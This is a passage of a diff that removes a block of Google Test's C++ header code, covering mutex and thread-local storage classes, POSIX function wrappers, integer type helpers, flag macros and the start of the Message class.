-  ~GTestMutexLock() { mutex_->Unlock(); }
-
- private:
-  Mutex* const mutex_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(GTestMutexLock);
-};
-
-typedef GTestMutexLock MutexLock;
-
-// Base class for ValueHolder<T>.  Allows a caller to hold and delete a value
-// without knowing its type.
-class ThreadLocalValueHolderBase {
- public:
-  virtual ~ThreadLocalValueHolderBase() {}
-};
-
-// Provides a way for a thread to send notifications to a ThreadLocal
-// regardless of its parameter type.
-class ThreadLocalBase {
- public:
-  // Creates a new ValueHolder<T> object holding a default value passed to
-  // this ThreadLocal<T>'s constructor and returns it.  It is the caller's
-  // responsibility not to call this when the ThreadLocal<T> instance already
-  // has a value on the current thread.
-  virtual ThreadLocalValueHolderBase* NewValueForCurrentThread() const = 0;
-
- protected:
-  ThreadLocalBase() {}
-  virtual ~ThreadLocalBase() {}
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadLocalBase);
-};
-
-// Maps a thread to a set of ThreadLocals that have values instantiated on that
-// thread and notifies them when the thread exits.  A ThreadLocal instance is
-// expected to persist until all threads it has values on have terminated.
-class GTEST_API_ ThreadLocalRegistry {
- public:
-  // Registers thread_local_instance as having value on the current thread.
-  // Returns a value that can be used to identify the thread from other threads.
-  static ThreadLocalValueHolderBase* GetValueOnCurrentThread(
-      const ThreadLocalBase* thread_local_instance);
-
-  // Invoked when a ThreadLocal instance is destroyed.
-  static void OnThreadLocalDestroyed(
-      const ThreadLocalBase* thread_local_instance);
-};
-
-class GTEST_API_ ThreadWithParamBase {
- public:
-  void Join();
-
- protected:
-  class Runnable {
-   public:
-    virtual ~Runnable() {}
-    virtual void Run() = 0;
-  };
-
-  ThreadWithParamBase(Runnable *runnable, Notification* thread_can_start);
-  virtual ~ThreadWithParamBase();
-
- private:
-  AutoHandle thread_;
-};
-
-// Helper class for testing Google Test's multi-threading constructs.
-template <typename T>
-class ThreadWithParam : public ThreadWithParamBase {
- public:
-  typedef void UserThreadFunc(T);
-
-  ThreadWithParam(UserThreadFunc* func, T param, Notification* thread_can_start)
-      : ThreadWithParamBase(new RunnableImpl(func, param), thread_can_start) {
-  }
-  virtual ~ThreadWithParam() {}
-
- private:
-  class RunnableImpl : public Runnable {
-   public:
-    RunnableImpl(UserThreadFunc* func, T param)
-        : func_(func),
-          param_(param) {
-    }
-    virtual ~RunnableImpl() {}
-    virtual void Run() {
-      func_(param_);
-    }
-
-   private:
-    UserThreadFunc* const func_;
-    const T param_;
-
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(RunnableImpl);
-  };
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadWithParam);
-};
-
-// Implements thread-local storage on Windows systems.
-//
-//   // Thread 1
-//   ThreadLocal<int> tl(100);  // 100 is the default value for each thread.
-//
-//   // Thread 2
-//   tl.set(150);  // Changes the value for thread 2 only.
-//   EXPECT_EQ(150, tl.get());
-//
-//   // Thread 1
-//   EXPECT_EQ(100, tl.get());  // In thread 1, tl has the original value.
-//   tl.set(200);
-//   EXPECT_EQ(200, tl.get());
-//
-// The template type argument T must have a public copy constructor.
-// In addition, the default ThreadLocal constructor requires T to have
-// a public default constructor.
-//
-// The users of a TheadLocal instance have to make sure that all but one
-// threads (including the main one) using that instance have exited before
-// destroying it. Otherwise, the per-thread objects managed for them by the
-// ThreadLocal instance are not guaranteed to be destroyed on all platforms.
-//
-// Google Test only uses global ThreadLocal objects.  That means they
-// will die after main() has returned.  Therefore, no per-thread
-// object managed by Google Test will be leaked as long as all threads
-// using Google Test have exited when main() returns.
-template <typename T>
-class ThreadLocal : public ThreadLocalBase {
- public:
-  ThreadLocal() : default_() {}
-  explicit ThreadLocal(const T& value) : default_(value) {}
-
-  ~ThreadLocal() { ThreadLocalRegistry::OnThreadLocalDestroyed(this); }
-
-  T* pointer() { return GetOrCreateValue(); }
-  const T* pointer() const { return GetOrCreateValue(); }
-  const T& get() const { return *pointer(); }
-  void set(const T& value) { *pointer() = value; }
-
- private:
-  // Holds a value of T.  Can be deleted via its base class without the caller
-  // knowing the type of T.
-  class ValueHolder : public ThreadLocalValueHolderBase {
-   public:
-    explicit ValueHolder(const T& value) : value_(value) {}
-
-    T* pointer() { return &value_; }
-
-   private:
-    T value_;
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(ValueHolder);
-  };
-
-
-  T* GetOrCreateValue() const {
-    return static_cast<ValueHolder*>(
-        ThreadLocalRegistry::GetValueOnCurrentThread(this))->pointer();
-  }
-
-  virtual ThreadLocalValueHolderBase* NewValueForCurrentThread() const {
-    return new ValueHolder(default_);
-  }
-
-  const T default_;  // The default value for each thread.
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadLocal);
-};
-
-# elif GTEST_HAS_PTHREAD
-
-// MutexBase and Mutex implement mutex on pthreads-based platforms.
-class MutexBase {
- public:
-  // Acquires this mutex.
-  void Lock() {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_lock(&mutex_));
-    owner_ = pthread_self();
-    has_owner_ = true;
-  }
-
-  // Releases this mutex.
-  void Unlock() {
-    // Since the lock is being released the owner_ field should no longer be
-    // considered valid. We don't protect writing to has_owner_ here, as it's
-    // the caller's responsibility to ensure that the current thread holds the
-    // mutex when this is called.
-    has_owner_ = false;
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_unlock(&mutex_));
-  }
-
-  // Does nothing if the current thread holds the mutex. Otherwise, crashes
-  // with high probability.
-  void AssertHeld() const {
-    GTEST_CHECK_(has_owner_ && pthread_equal(owner_, pthread_self()))
-        << "The current thread is not holding the mutex @" << this;
-  }
-
-  // A static mutex may be used before main() is entered.  It may even
-  // be used before the dynamic initialization stage.  Therefore we
-  // must be able to initialize a static mutex object at link time.
-  // This means MutexBase has to be a POD and its member variables
-  // have to be public.
- public:
-  pthread_mutex_t mutex_;  // The underlying pthread mutex.
-  // has_owner_ indicates whether the owner_ field below contains a valid thread
-  // ID and is therefore safe to inspect (e.g., to use in pthread_equal()). All
-  // accesses to the owner_ field should be protected by a check of this field.
-  // An alternative might be to memset() owner_ to all zeros, but there's no
-  // guarantee that a zero'd pthread_t is necessarily invalid or even different
-  // from pthread_self().
-  bool has_owner_;
-  pthread_t owner_;  // The thread holding the mutex.
-};
-
-// Forward-declares a static mutex.
-#  define GTEST_DECLARE_STATIC_MUTEX_(mutex) \
-     extern ::testing::internal::MutexBase mutex
-
-// Defines and statically (i.e. at link time) initializes a static mutex.
-// The initialization list here does not explicitly initialize each field,
-// instead relying on default initialization for the unspecified fields. In
-// particular, the owner_ field (a pthread_t) is not explicitly initialized.
-// This allows initialization to work whether pthread_t is a scalar or struct.
-// The flag -Wmissing-field-initializers must not be specified for this to work.
-#  define GTEST_DEFINE_STATIC_MUTEX_(mutex) \
-     ::testing::internal::MutexBase mutex = { PTHREAD_MUTEX_INITIALIZER, false }
-
-// The Mutex class can only be used for mutexes created at runtime. It
-// shares its API with MutexBase otherwise.
-class Mutex : public MutexBase {
- public:
-  Mutex() {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_init(&mutex_, NULL));
-    has_owner_ = false;
-  }
-  ~Mutex() {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_destroy(&mutex_));
-  }
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Mutex);
-};
-
-// We cannot name this class MutexLock because the ctor declaration would
-// conflict with a macro named MutexLock, which is defined on some
-// platforms. That macro is used as a defensive measure to prevent against
-// inadvertent misuses of MutexLock like "MutexLock(&mu)" rather than
-// "MutexLock l(&mu)".  Hence the typedef trick below.
-class GTestMutexLock {
- public:
-  explicit GTestMutexLock(MutexBase* mutex)
-      : mutex_(mutex) { mutex_->Lock(); }
-
-  ~GTestMutexLock() { mutex_->Unlock(); }
-
- private:
-  MutexBase* const mutex_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(GTestMutexLock);
-};
-
-typedef GTestMutexLock MutexLock;
-
-// Helpers for ThreadLocal.
-
-// pthread_key_create() requires DeleteThreadLocalValue() to have
-// C-linkage.  Therefore it cannot be templatized to access
-// ThreadLocal<T>.  Hence the need for class
-// ThreadLocalValueHolderBase.
-class ThreadLocalValueHolderBase {
- public:
-  virtual ~ThreadLocalValueHolderBase() {}
-};
-
-// Called by pthread to delete thread-local data stored by
-// pthread_setspecific().
-extern "C" inline void DeleteThreadLocalValue(void* value_holder) {
-  delete static_cast<ThreadLocalValueHolderBase*>(value_holder);
-}
-
-// Implements thread-local storage on pthreads-based systems.
-template <typename T>
-class ThreadLocal {
- public:
-  ThreadLocal() : key_(CreateKey()),
-                  default_() {}
-  explicit ThreadLocal(const T& value) : key_(CreateKey()),
-                                         default_(value) {}
-
-  ~ThreadLocal() {
-    // Destroys the managed object for the current thread, if any.
-    DeleteThreadLocalValue(pthread_getspecific(key_));
-
-    // Releases resources associated with the key.  This will *not*
-    // delete managed objects for other threads.
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_key_delete(key_));
-  }
-
-  T* pointer() { return GetOrCreateValue(); }
-  const T* pointer() const { return GetOrCreateValue(); }
-  const T& get() const { return *pointer(); }
-  void set(const T& value) { *pointer() = value; }
-
- private:
-  // Holds a value of type T.
-  class ValueHolder : public ThreadLocalValueHolderBase {
-   public:
-    explicit ValueHolder(const T& value) : value_(value) {}
-
-    T* pointer() { return &value_; }
-
-   private:
-    T value_;
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(ValueHolder);
-  };
-
-  static pthread_key_t CreateKey() {
-    pthread_key_t key;
-    // When a thread exits, DeleteThreadLocalValue() will be called on
-    // the object managed for that thread.
-    GTEST_CHECK_POSIX_SUCCESS_(
-        pthread_key_create(&key, &DeleteThreadLocalValue));
-    return key;
-  }
-
-  T* GetOrCreateValue() const {
-    ThreadLocalValueHolderBase* const holder =
-        static_cast<ThreadLocalValueHolderBase*>(pthread_getspecific(key_));
-    if (holder != NULL) {
-      return CheckedDowncastToActualType<ValueHolder>(holder)->pointer();
-    }
-
-    ValueHolder* const new_holder = new ValueHolder(default_);
-    ThreadLocalValueHolderBase* const holder_base = new_holder;
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_setspecific(key_, holder_base));
-    return new_holder->pointer();
-  }
-
-  // A key pthreads uses for looking up per-thread values.
-  const pthread_key_t key_;
-  const T default_;  // The default value for each thread.
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadLocal);
-};
-
-# endif  // OS detection
-
-#else  // GTEST_IS_THREADSAFE
-
-// A dummy implementation of synchronization primitives (mutex, lock,
-// and thread-local variable).  Necessary for compiling Google Test where
-// mutex is not supported - using Google Test in multiple threads is not
-// supported on such platforms.
-
-class Mutex {
- public:
-  Mutex() {}
-  void Lock() {}
-  void Unlock() {}
-  void AssertHeld() const {}
-};
-
-# define GTEST_DECLARE_STATIC_MUTEX_(mutex) \
-  extern ::testing::internal::Mutex mutex
-
-# define GTEST_DEFINE_STATIC_MUTEX_(mutex) ::testing::internal::Mutex mutex
-
-// We cannot name this class MutexLock because the ctor declaration would
-// conflict with a macro named MutexLock, which is defined on some
-// platforms. That macro is used as a defensive measure to prevent against
-// inadvertent misuses of MutexLock like "MutexLock(&mu)" rather than
-// "MutexLock l(&mu)".  Hence the typedef trick below.
-class GTestMutexLock {
- public:
-  explicit GTestMutexLock(Mutex*) {}  // NOLINT
-};
-
-typedef GTestMutexLock MutexLock;
-
-template <typename T>
-class ThreadLocal {
- public:
-  ThreadLocal() : value_() {}
-  explicit ThreadLocal(const T& value) : value_(value) {}
-  T* pointer() { return &value_; }
-  const T* pointer() const { return &value_; }
-  const T& get() const { return value_; }
-  void set(const T& value) { value_ = value; }
- private:
-  T value_;
-};
-
-#endif  // GTEST_IS_THREADSAFE
-
-// Returns the number of threads running in the process, or 0 to indicate that
-// we cannot detect it.
-GTEST_API_ size_t GetThreadCount();
-
-// Passing non-POD classes through ellipsis (...) crashes the ARM
-// compiler and generates a warning in Sun Studio.  The Nokia Symbian
-// and the IBM XL C/C++ compiler try to instantiate a copy constructor
-// for objects passed through ellipsis (...), failing for uncopyable
-// objects.  We define this to ensure that only POD is passed through
-// ellipsis on these systems.
-#if defined(__SYMBIAN32__) || defined(__IBMCPP__) || defined(__SUNPRO_CC)
-// We lose support for NULL detection where the compiler doesn't like
-// passing non-POD classes through ellipsis (...).
-# define GTEST_ELLIPSIS_NEEDS_POD_ 1
-#else
-# define GTEST_CAN_COMPARE_NULL 1
-#endif
-
-// The Nokia Symbian and IBM XL C/C++ compilers cannot decide between
-// const T& and const T* in a function template.  These compilers
-// _can_ decide between class template specializations for T and T*,
-// so a tr1::type_traits-like is_pointer works.
-#if defined(__SYMBIAN32__) || defined(__IBMCPP__)
-# define GTEST_NEEDS_IS_POINTER_ 1
-#endif
-
-template <bool bool_value>
-struct bool_constant {
-  typedef bool_constant<bool_value> type;
-  static const bool value = bool_value;
-};
-template <bool bool_value> const bool bool_constant<bool_value>::value;
-
-typedef bool_constant<false> false_type;
-typedef bool_constant<true> true_type;
-
-template <typename T>
-struct is_pointer : public false_type {};
-
-template <typename T>
-struct is_pointer<T*> : public true_type {};
-
-template <typename Iterator>
-struct IteratorTraits {
-  typedef typename Iterator::value_type value_type;
-};
-
-template <typename T>
-struct IteratorTraits<T*> {
-  typedef T value_type;
-};
-
-template <typename T>
-struct IteratorTraits<const T*> {
-  typedef T value_type;
-};
-
-#if GTEST_OS_WINDOWS
-# define GTEST_PATH_SEP_ "\\"
-# define GTEST_HAS_ALT_PATH_SEP_ 1
-// The biggest signed integer type the compiler supports.
-typedef __int64 BiggestInt;
-#else
-# define GTEST_PATH_SEP_ "/"
-# define GTEST_HAS_ALT_PATH_SEP_ 0
-typedef long long BiggestInt;  // NOLINT
-#endif  // GTEST_OS_WINDOWS
-
-// Utilities for char.
-
-// isspace(int ch) and friends accept an unsigned char or EOF.  char
-// may be signed, depending on the compiler (or compiler flags).
-// Therefore we need to cast a char to unsigned char before calling
-// isspace(), etc.
-
-inline bool IsAlpha(char ch) {
-  return isalpha(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsAlNum(char ch) {
-  return isalnum(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsDigit(char ch) {
-  return isdigit(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsLower(char ch) {
-  return islower(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsSpace(char ch) {
-  return isspace(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsUpper(char ch) {
-  return isupper(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsXDigit(char ch) {
-  return isxdigit(static_cast<unsigned char>(ch)) != 0;
-}
-inline bool IsXDigit(wchar_t ch) {
-  const unsigned char low_byte = static_cast<unsigned char>(ch);
-  return ch == low_byte && isxdigit(low_byte) != 0;
-}
-
-inline char ToLower(char ch) {
-  return static_cast<char>(tolower(static_cast<unsigned char>(ch)));
-}
-inline char ToUpper(char ch) {
-  return static_cast<char>(toupper(static_cast<unsigned char>(ch)));
-}
-
-inline std::string StripTrailingSpaces(std::string str) {
-  std::string::iterator it = str.end();
-  while (it != str.begin() && IsSpace(*--it))
-    it = str.erase(it);
-  return str;
-}
-
-// The testing::internal::posix namespace holds wrappers for common
-// POSIX functions.  These wrappers hide the differences between
-// Windows/MSVC and POSIX systems.  Since some compilers define these
-// standard functions as macros, the wrapper cannot have the same name
-// as the wrapped function.
-
-namespace posix {
-
-// Functions with a different name on Windows.
-
-#if GTEST_OS_WINDOWS
-
-typedef struct _stat StatStruct;
-
-# ifdef __BORLANDC__
-inline int IsATTY(int fd) { return isatty(fd); }
-inline int StrCaseCmp(const char* s1, const char* s2) {
-  return stricmp(s1, s2);
-}
-inline char* StrDup(const char* src) { return strdup(src); }
-# else  // !__BORLANDC__
-#  if GTEST_OS_WINDOWS_MOBILE
-inline int IsATTY(int /* fd */) { return 0; }
-#  else
-inline int IsATTY(int fd) { return _isatty(fd); }
-#  endif  // GTEST_OS_WINDOWS_MOBILE
-inline int StrCaseCmp(const char* s1, const char* s2) {
-  return _stricmp(s1, s2);
-}
-inline char* StrDup(const char* src) { return _strdup(src); }
-# endif  // __BORLANDC__
-
-# if GTEST_OS_WINDOWS_MOBILE
-inline int FileNo(FILE* file) { return reinterpret_cast<int>(_fileno(file)); }
-// Stat(), RmDir(), and IsDir() are not needed on Windows CE at this
-// time and thus not defined there.
-# else
-inline int FileNo(FILE* file) { return _fileno(file); }
-inline int Stat(const char* path, StatStruct* buf) { return _stat(path, buf); }
-inline int RmDir(const char* dir) { return _rmdir(dir); }
-inline bool IsDir(const StatStruct& st) {
-  return (_S_IFDIR & st.st_mode) != 0;
-}
-# endif  // GTEST_OS_WINDOWS_MOBILE
-
-#else
-
-typedef struct stat StatStruct;
-
-inline int FileNo(FILE* file) { return fileno(file); }
-inline int IsATTY(int fd) { return isatty(fd); }
-inline int Stat(const char* path, StatStruct* buf) { return stat(path, buf); }
-inline int StrCaseCmp(const char* s1, const char* s2) {
-  return strcasecmp(s1, s2);
-}
-inline char* StrDup(const char* src) { return strdup(src); }
-inline int RmDir(const char* dir) { return rmdir(dir); }
-inline bool IsDir(const StatStruct& st) { return S_ISDIR(st.st_mode); }
-
-#endif  // GTEST_OS_WINDOWS
-
-// Functions deprecated by MSVC 8.0.
-
-GTEST_DISABLE_MSC_WARNINGS_PUSH_(4996 /* deprecated function */)
-
-inline const char* StrNCpy(char* dest, const char* src, size_t n) {
-  return strncpy(dest, src, n);
-}
-
-// ChDir(), FReopen(), FDOpen(), Read(), Write(), Close(), and
-// StrError() aren't needed on Windows CE at this time and thus not
-// defined there.
-
-#if !GTEST_OS_WINDOWS_MOBILE && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-inline int ChDir(const char* dir) { return chdir(dir); }
-#endif
-inline FILE* FOpen(const char* path, const char* mode) {
-  return fopen(path, mode);
-}
-#if !GTEST_OS_WINDOWS_MOBILE
-inline FILE *FReopen(const char* path, const char* mode, FILE* stream) {
-  return freopen(path, mode, stream);
-}
-inline FILE* FDOpen(int fd, const char* mode) { return fdopen(fd, mode); }
-#endif
-inline int FClose(FILE* fp) { return fclose(fp); }
-#if !GTEST_OS_WINDOWS_MOBILE
-inline int Read(int fd, void* buf, unsigned int count) {
-  return static_cast<int>(read(fd, buf, count));
-}
-inline int Write(int fd, const void* buf, unsigned int count) {
-  return static_cast<int>(write(fd, buf, count));
-}
-inline int Close(int fd) { return close(fd); }
-inline const char* StrError(int errnum) { return strerror(errnum); }
-#endif
-inline const char* GetEnv(const char* name) {
-#if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_WINDOWS_PHONE | GTEST_OS_WINDOWS_RT
-  // We are on Windows CE, which has no environment variables.
-  static_cast<void>(name);  // To prevent 'unused argument' warning.
-  return NULL;
-#elif defined(__BORLANDC__) || defined(__SunOS_5_8) || defined(__SunOS_5_9)
-  // Environment variables which we programmatically clear will be set to the
-  // empty string rather than unset (NULL).  Handle that case.
-  const char* const env = getenv(name);
-  return (env != NULL && env[0] != '\0') ? env : NULL;
-#else
-  return getenv(name);
-#endif
-}
-
-GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-#if GTEST_OS_WINDOWS_MOBILE
-// Windows CE has no C library. The abort() function is used in
-// several places in Google Test. This implementation provides a reasonable
-// imitation of standard behaviour.
-void Abort();
-#else
-inline void Abort() { abort(); }
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-}  // namespace posix
-
-// MSVC "deprecates" snprintf and issues warnings wherever it is used.  In
-// order to avoid these warnings, we need to use _snprintf or _snprintf_s on
-// MSVC-based platforms.  We map the GTEST_SNPRINTF_ macro to the appropriate
-// function in order to achieve that.  We use macro definition here because
-// snprintf is a variadic function.
-#if _MSC_VER >= 1400 && !GTEST_OS_WINDOWS_MOBILE
-// MSVC 2005 and above support variadic macros.
-# define GTEST_SNPRINTF_(buffer, size, format, ...) \
-     _snprintf_s(buffer, size, size, format, __VA_ARGS__)
-#elif defined(_MSC_VER)
-// Windows CE does not define _snprintf_s and MSVC prior to 2005 doesn't
-// complain about _snprintf.
-# define GTEST_SNPRINTF_ _snprintf
-#else
-# define GTEST_SNPRINTF_ snprintf
-#endif
-
-// The maximum number a BiggestInt can represent.  This definition
-// works no matter BiggestInt is represented in one's complement or
-// two's complement.
-//
-// We cannot rely on numeric_limits in STL, as __int64 and long long
-// are not part of standard C++ and numeric_limits doesn't need to be
-// defined for them.
-const BiggestInt kMaxBiggestInt =
-    ~(static_cast<BiggestInt>(1) << (8*sizeof(BiggestInt) - 1));
-
-// This template class serves as a compile-time function from size to
-// type.  It maps a size in bytes to a primitive type with that
-// size. e.g.
-//
-//   TypeWithSize<4>::UInt
-//
-// is typedef-ed to be unsigned int (unsigned integer made up of 4
-// bytes).
-//
-// Such functionality should belong to STL, but I cannot find it
-// there.
-//
-// Google Test uses this class in the implementation of floating-point
-// comparison.
-//
-// For now it only handles UInt (unsigned int) as that's all Google Test
-// needs.  Other types can be easily added in the future if need
-// arises.
-template <size_t size>
-class TypeWithSize {
- public:
-  // This prevents the user from using TypeWithSize<N> with incorrect
-  // values of N.
-  typedef void UInt;
-};
-
-// The specialization for size 4.
-template <>
-class TypeWithSize<4> {
- public:
-  // unsigned int has size 4 in both gcc and MSVC.
-  //
-  // As base/basictypes.h doesn't compile on Windows, we cannot use
-  // uint32, uint64, and etc here.
-  typedef int Int;
-  typedef unsigned int UInt;
-};
-
-// The specialization for size 8.
-template <>
-class TypeWithSize<8> {
- public:
-#if GTEST_OS_WINDOWS
-  typedef __int64 Int;
-  typedef unsigned __int64 UInt;
-#else
-  typedef long long Int;  // NOLINT
-  typedef unsigned long long UInt;  // NOLINT
-#endif  // GTEST_OS_WINDOWS
-};
-
-// Integer types of known sizes.
-typedef TypeWithSize<4>::Int Int32;
-typedef TypeWithSize<4>::UInt UInt32;
-typedef TypeWithSize<8>::Int Int64;
-typedef TypeWithSize<8>::UInt UInt64;
-typedef TypeWithSize<8>::Int TimeInMillis;  // Represents time in milliseconds.
-
-// Utilities for command line flags and environment variables.
-
-// Macro for referencing flags.
-#define GTEST_FLAG(name) FLAGS_gtest_##name
-
-// Macros for declaring flags.
-#define GTEST_DECLARE_bool_(name) GTEST_API_ extern bool GTEST_FLAG(name)
-#define GTEST_DECLARE_int32_(name) \
-    GTEST_API_ extern ::testing::internal::Int32 GTEST_FLAG(name)
-#define GTEST_DECLARE_string_(name) \
-    GTEST_API_ extern ::std::string GTEST_FLAG(name)
-
-// Macros for defining flags.
-#define GTEST_DEFINE_bool_(name, default_val, doc) \
-    GTEST_API_ bool GTEST_FLAG(name) = (default_val)
-#define GTEST_DEFINE_int32_(name, default_val, doc) \
-    GTEST_API_ ::testing::internal::Int32 GTEST_FLAG(name) = (default_val)
-#define GTEST_DEFINE_string_(name, default_val, doc) \
-    GTEST_API_ ::std::string GTEST_FLAG(name) = (default_val)
-
-// Thread annotations
-#define GTEST_EXCLUSIVE_LOCK_REQUIRED_(locks)
-#define GTEST_LOCK_EXCLUDED_(locks)
-
-// Parses 'str' for a 32-bit signed integer.  If successful, writes the result
-// to *value and returns true; otherwise leaves *value unchanged and returns
-// false.
-// TODO(chandlerc): Find a better way to refactor flag and environment parsing
-// out of both gtest-port.cc and gtest.cc to avoid exporting this utility
-// function.
-bool ParseInt32(const Message& src_text, const char* str, Int32* value);
-
-// Parses a bool/Int32/string from the environment variable
-// corresponding to the given Google Test flag.
-bool BoolFromGTestEnv(const char* flag, bool default_val);
-GTEST_API_ Int32 Int32FromGTestEnv(const char* flag, Int32 default_val);
-const char* StringFromGTestEnv(const char* flag, const char* default_val);
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PORT_H_
-
-
-#if GTEST_OS_LINUX
-# include <stdlib.h>
-# include <sys/types.h>
-# include <sys/wait.h>
-# include <unistd.h>
-#endif  // GTEST_OS_LINUX
-
-#if GTEST_HAS_EXCEPTIONS
-# include <stdexcept>
-#endif
-
-#include <ctype.h>
-#include <float.h>
-#include <string.h>
-#include <iomanip>
-#include <limits>
-#include <set>
-#include <string>
-#include <vector>
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines the Message class.
-//
-// IMPORTANT NOTE: Due to limitation of the C++ language, we have to
-// leave some internal implementation details in this header file.
-// They are clearly marked by comments like this:
-//
-//   // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-//
-// Such code is NOT meant to be used by a user directly, and is subject
-// to CHANGE WITHOUT NOTICE.  Therefore DO NOT DEPEND ON IT in a user
-// program!
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_MESSAGE_H_
-#define GTEST_INCLUDE_GTEST_GTEST_MESSAGE_H_
-
-#include <limits>
-
-
-// Ensures that there is at least one operator<< in the global namespace.
-// See Message& operator<<(...) below for why.
-void operator<<(const testing::internal::Secret&, int);
-
-namespace testing {
-
-// The Message class works like an ostream repeater.
-//
-// Typical usage:
-//
-//   1. You stream a bunch of values to a Message object.
-//      It will remember the text in a stringstream.
-//   2. Then you stream the Message object to an ostream.
-//      This causes the text in the Message to be streamed
-//      to the ostream.
-//
-// For example;
-//
-//   testing::Message foo;
-//   foo << 1 << " != " << 2;
-//   std::cout << foo;
-//
-// will print "1 != 2".
-//
-// Message is not intended to be inherited from.  In particular, its
-// destructor is not virtual.
-//
-// Note that stringstream behaves differently in gcc and in MSVC.  You
-// can stream a NULL char pointer to it in the former, but not in the
-// latter (it causes an access violation if you do).  The Message
-// class hides this difference by treating a NULL char pointer as
-// "(null)".
-class GTEST_API_ Message {
- private:
-  // The type of basic IO manipulators (endl, ends, and flush) for
-  // narrow streams.
-  typedef std::ostream& (*BasicNarrowIoManip)(std::ostream&);
-
- public:
-  // Constructs an empty Message.
-  Message();
-
-  // Copy constructor.
-  Message(const Message& msg) : ss_(new ::std::stringstream) {  // NOLINT
-    *ss_ << msg.GetString();
-  }
-
-  // Constructs a Message from a C-string.
-  explicit Message(const char* str) : ss_(new ::std::stringstream) {
-    *ss_ << str;
-  }
-
-#if GTEST_OS_SYMBIAN
-  // Streams a value (either a pointer or not) to this object.
-  template <typename T>
-  inline Message& operator <<(const T& value) {
-    StreamHelper(typename internal::is_pointer<T>::type(), value);
-    return *this;
-  }
-#else
-  // Streams a non-pointer value to this object.
-  template <typename T>
-  inline Message& operator <<(const T& val) {
-    // Some libraries overload << for STL containers.  These
-    // overloads are defined in the global namespace instead of ::std.
-    //
-    // C++'s symbol lookup rule (i.e. Koenig lookup) says that these
-    // overloads are visible in either the std namespace or the global
-    // namespace, but not other namespaces, including the testing
-    // namespace which Google Test's Message class is in.
-    //
-    // To allow STL containers (and other types that has a << operator
-    // defined in the global namespace) to be used in Google Test
-    // assertions, testing::Message must access the custom << operator
-    // from the global namespace.  With this using declaration,
-    // overloads of << defined in the global namespace and those
-    // visible via Koenig lookup are both exposed in this function.
-    using ::operator <<;
-    *ss_ << val;
-    return *this;
-  }
-
-  // Streams a pointer value to this object.
-  //
-  // This function is an overload of the previous one.  When you
-  // stream a pointer to a Message, this definition will be used as it
-  // is more specialized.  (The C++ Standard, section
-  // [temp.func.order].)  If you stream a non-pointer, then the
-  // previous definition will be used.
-  //
-  // The reason for this overload is that streaming a NULL pointer to
-  // ostream is undefined behavior.  Depending on the compiler, you
-  // may get "0", "(nil)", "(null)", or an access violation.  To
-  // ensure consistent result across compilers, we always treat NULL
-  // as "(null)".
-  template <typename T>
-  inline Message& operator <<(T* const& pointer) {  // NOLINT
-    if (pointer == NULL) {
-      *ss_ << "(null)";
-    } else {
-      *ss_ << pointer;
-    }
-    return *this;
-  }
-#endif  // GTEST_OS_SYMBIAN
-
-  // Since the basic IO manipulators are overloaded for both narrow
-  // and wide streams, we have to provide this specialized definition
-  // of operator <<, even though its body is the same as the
-  // templatized version above.  Without this definition, streaming
-  // endl or other basic IO manipulators to Message will confuse the
-  // compiler.
-  Message& operator <<(BasicNarrowIoManip val) {
